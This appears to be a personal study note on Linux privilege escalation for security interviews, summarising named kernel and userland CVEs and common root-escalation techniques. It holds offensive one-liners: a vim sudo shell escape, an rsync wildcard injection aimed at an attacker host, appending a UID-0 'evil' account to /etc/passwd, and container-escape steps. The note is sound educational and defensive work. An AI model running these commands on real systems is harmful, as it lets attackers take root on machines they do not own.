Linux Exploits — Mythos Findings & Core Knowledge
Tracks CVEs, techniques, and privilege escalation paths. The "Mythos" section records exploits attributed to or curated by the mythos researcher/handle. The general sections cover must-know Linux kernel exploits for security interviews.
Mythos-Attributed Findings
Add CVE numbers, PoC links, and affected kernel versions here as they're discovered/published.
| CVE | Affected Versions | Type | Notes |
|---|---|---|---|
| TBD | — | — | Populate as mythos publishes findings |
Memory hookmost Linux privesc CVEs are one of three bug-shapes, all aiming at "user → root." When you read these CVEs, sort them by primitive: race conditions / TOCTOU (DirtyCOW, Dirty Pipe — win a timing window to write something you shouldn't), memory corruption (use-after-free and overflows in the kernel or a setuid program — PwnKit/pkexec, Baron Samedit/sudo), and logic/validation flaws (the eBPF verifier mis-proving a program safe, a namespace or capability check missed). They share a goal — turn local code execution into root — and a defense story: the kernel-hardening sysctls and
nosuid/lockdown from linux-hardening plus patching fast, since these get weaponized within hours. Detection-wise, kernel exploits are hard to catch on the way in, so you lean on the aftermath — an unexpected uid-0 process, a setuid binary appearing, auditd execve anomalies. Mnemonic: race, corruption, or logic — three roads to root.
Must-Know Linux Kernel CVEs
DirtyCOW — CVE-2016-5195
Race condition in copy-on-write (COW) mechanism in mmap
Any unprivileged local user can write to read-only memory mappings → overwrite SUID binaries or /etc/passwd
Linux kernel < 4.8.3
Write to /proc/self/mem racing against madvise(MADV_DONTNEED)
vm_write_begin/vm_write_end serialisation added in 4.8.3
Classic race condition; explain COW semantics and why MADV_DONTNEED breaks the invariant
One of the first "celebrity" bugs — it got a name, a logo, and merch. Linus Torvalds wrote the fix himself and admitted he'd actually tried to fix the same bug back in 2005, but the fix was reverted because it broke s390 hardware nobody could test on. So the hole sat open for ~11 years. The name is a pun on Copy-On-Write.
DirtyPipe — CVE-2022-0847
Uninitialized pipe_buffer.flags allows overwriting read-only page cache
Unprivileged user overwrites arbitrary read-only files (e.g., SUID binaries, /etc/passwd)
Linux kernel 5.8 – 5.16.10 / 5.15.24 / 5.10.101
splice() + write() to a pipe; flag PIPE_BUF_FLAG_CAN_MERGE not cleared on new pipe buffer
Clear flags on pipe_buf_operations allocation
Contrast with DirtyCOW — no race condition needed; simpler and more reliable
Max Kellermann found it by accident — he was debugging corrupted files in a customer's web-server download logs (recurring CRC checksum errors) and the trail led to a kernel memory bug, not a disk fault. The name is a deliberate homage to DirtyCOW. Because there's no race to win, the exploit is 100% reliable on the first try — which is rare and scary for a kernel privesc.
Overlayfs Privilege Escalation — CVE-2023-0386
File capability copy without uid mapping check in OverlayFS
Unprivileged user copies a file with CAP_SETUID capability into an overlay mount → executes as root
Linux kernel < 6.2
copy_up in OverlayFS doesn't strip extended attributes (xattrs) holding capabilities when the source is in a different uid namespace
Capability stripping on copy_up across uid namespace boundaries
eBPF Privilege Escalation — CVE-2021-3490 / CVE-2021-31440
Out-of-bounds read/write in eBPF ALU32 bitwise operations verifier
Local user with CAP_BPF or unprivileged eBPF enabled → kernel code execution
5.7 – 5.11
eBPF verifier bugs are a consistent attack surface; know what the verifier is supposed to do (prevent arbitrary memory access from BPF programs)
PwnKit — CVE-2021-4034
Local privilege escalation in pkexec (Polkit)
Any local unprivileged user → root (user-space bug, not kernel)
Every pkexec version since 2009
argc == 0 path in pkexec doesn't validate argv[0]; crafted environment leads to writing out-of-bounds into envp then loading attacker-controlled shared library
Polkit 0.120
The bug had been sitting in pkexec since its very first release in 2009 — about 12 years — on essentially every major Linux distro. It's a userspace bug (Polkit), so updating the kernel does nothing; you patch the package. Discovered by Qualys, who also named Baron Samedit (CVE-2021-3156, a ~10-year-old sudo heap overflow). Lesson: setuid userland helpers are as juicy a target as the kernel — and "ancient + everywhere" is the recurring theme.
Looney Tunables — CVE-2023-4911
Buffer overflow in glibc's ld.so dynamic linker when processing GLIBC_TUNABLES
Local user with control over environment variables → local root
glibc 2.34+
tunables_strdup() overflows a stack buffer during env var parsing in SUID execution context
Qualys named it after the GLIBC_TUNABLES environment variable (and Looney Tunes). It hit default installs of Fedora, Ubuntu, and Debian — no exotic config needed. It's a reminder that the dynamic linker (ld.so) runs with the privileges of whatever SUID binary you launch, so a bug in how it parses environment variables is a root bug, because the attacker fully controls the environment.
Netfilter / nftables — CVE-2023-32233 / CVE-2022-32250
Use-after-free in nftables (netfilter)
Local user with CAP_NET_ADMIN → kernel code execution → root
Various kernel versions 5.x
nftables has been a recurring source of UAFs; namespace-based CAP_NET_ADMIN makes this reachable from container breakouts too
Linux Privilege Escalation Techniques
SUID/SGID Binaries
find / -perm -4000 -type f 2>/dev/null # find SUID binaries
find / -perm -2000 -type f 2>/dev/null # find SGID binaries- GTFOBins: list of Unix binaries that can be abused when they have SUID set
- Common targets:
find,vim,bash,cp,nmap,python - In plain English: the SUID bit makes a program run as its owner (usually root) no matter who launches it. Harmless for
passwd; catastrophic for anything that can run your commands.findcan run a command (-exec),vim/pythoncan spawn a shell,cpcan overwrite/etc/passwd— so if any of them is SUID-root, it's a one-liner to root. - 🧠 Fun fact: GTFOBins is a searchable catalogue of exactly these one-liners. Workflow on a box:
find / -perm -4000 2>/dev/null, then look up each result on GTFOBins. The defender does the same search — your SUID list should be short and boring; a SUIDpython3orfindis a giant red flag someone put there.
Sudo Misconfigurations
sudo -l # list allowed sudo commands(ALL) NOPASSWD: /usr/bin/vim→:!/bin/bashinside vim → root shell- Wildcard abuse:
sudo rsync * attacker:/tmp/→ inject--rsh=sh exploit.sh
Cron Jobs
cat /etc/crontab
ls -la /etc/cron*- World-writable script executed by root cron → replace content
- PATH hijacking: cron runs
backup.shwithout absolute path; attacker controls earlier PATH directory
Writable /etc/passwd
openssl passwd -1 -salt evil evilpassword # make an MD5 ($1$) hash for a password you know
echo 'evil:$1$evil$...:0:0:root:/root:/bin/bash' >> /etc/passwd # the two 0s = UID 0, GID 0 = ROOT
su evil # log in with evilpassword → root shell- If
/etc/passwdis world-writable, add a root-equivalent user. Root is defined byUID 0, not by the nameroot— so any account whose third field is0is root. Modern systems keep real hashes in/etc/shadow, but/etc/passwdstill accepts an inline hash in field 2 (a legacy fallback), which is why this one-liner works. (Full passwd-vs-shadow breakdown and offline-cracking workflow: privilege-escalation.md.)
Kernel Exploit Path (Generic)
uname -a→ identify kernel version- Search CVEs:
searchsploit linux kernel <version> - Compile PoC on target (or cross-compile)
- Upload via writable dir (
/tmp,/dev/shm) - Execute → root shell
NFS No_root_squash
cat /etc/exports # look for no_root_squash
showmount -e <target>- Mount NFS share as root on attacker machine → create SUID binary → execute on target
Docker/Container Escape Paths
--privilegedcontainer →mount /dev/sda1 /mnt→ chroot into hostdocker.sockmounted inside container → create new privileged containerCAP_SYS_ADMIN→cgroups release_agentPoC (classic container escape)
📖Why these work — a container is not a VM. A container is just processes on the host kernel, fenced off by namespaces (separate views of PIDs, mounts, network) and cgroups (resource limits). There's no hardware boundary like a VM has, so anything that lets you punch through the fence drops you onto the host. The three above are the classic holes:
--privilegedremoves almost all the fencing (you can see and mount the host's disks → read/write the real filesystem); a mounteddocker.sockis the Docker daemon's API — and the daemon runs as root on the host, so "talk to the socket" = "ask root to run anything for you"; andCAP_SYS_ADMIN("the new root") lets you abuse the cgrouprelease_agentto make the host kernel execute your script. Takeaway:--privileged, a mounted docker socket, andCAP_SYS_ADMINare the three things to grep for first.
Kernel Architecture Reminders
| Concept | Notes |
|---|---|
| Ring 0 / Ring 3 | Kernel space (0) vs user space (3); syscalls cross the boundary |
| syscall table | Pointer array; rootkits often hook here |
| mmap / COW | Map-on-write defers physical copy until write; DirtyCOW breaks this |
| eBPF verifier | Validates BPF programs before JIT; verifier bugs = kernel privesc |
| Namespaces | pid, net, mnt, user, uts, ipc; user namespaces enable unprivileged eBPF/nftables |
| Capabilities | Fine-grained root privileges; CAP_NET_ADMIN, CAP_SYS_ADMIN, CAP_BPF |
| SMEP/SMAP | Prevent kernel from executing/reading user-space pages |
| KASLR | Kernel Address Space Layout Randomisation; info leak needed first |
| Stack canary | Guard value before return address; stack smashing mitigation |
Useful Tools
| Tool | Purpose |
|---|---|
linpeas.sh | Automated Linux privilege escalation enumeration |
linux-exploit-suggester | Match kernel version to known CVEs |
pspy | Monitor processes without root (detects cron jobs) |
GTFOBins | SUID/sudo/cron binary abuse reference |
searchsploit | Local ExploitDB search |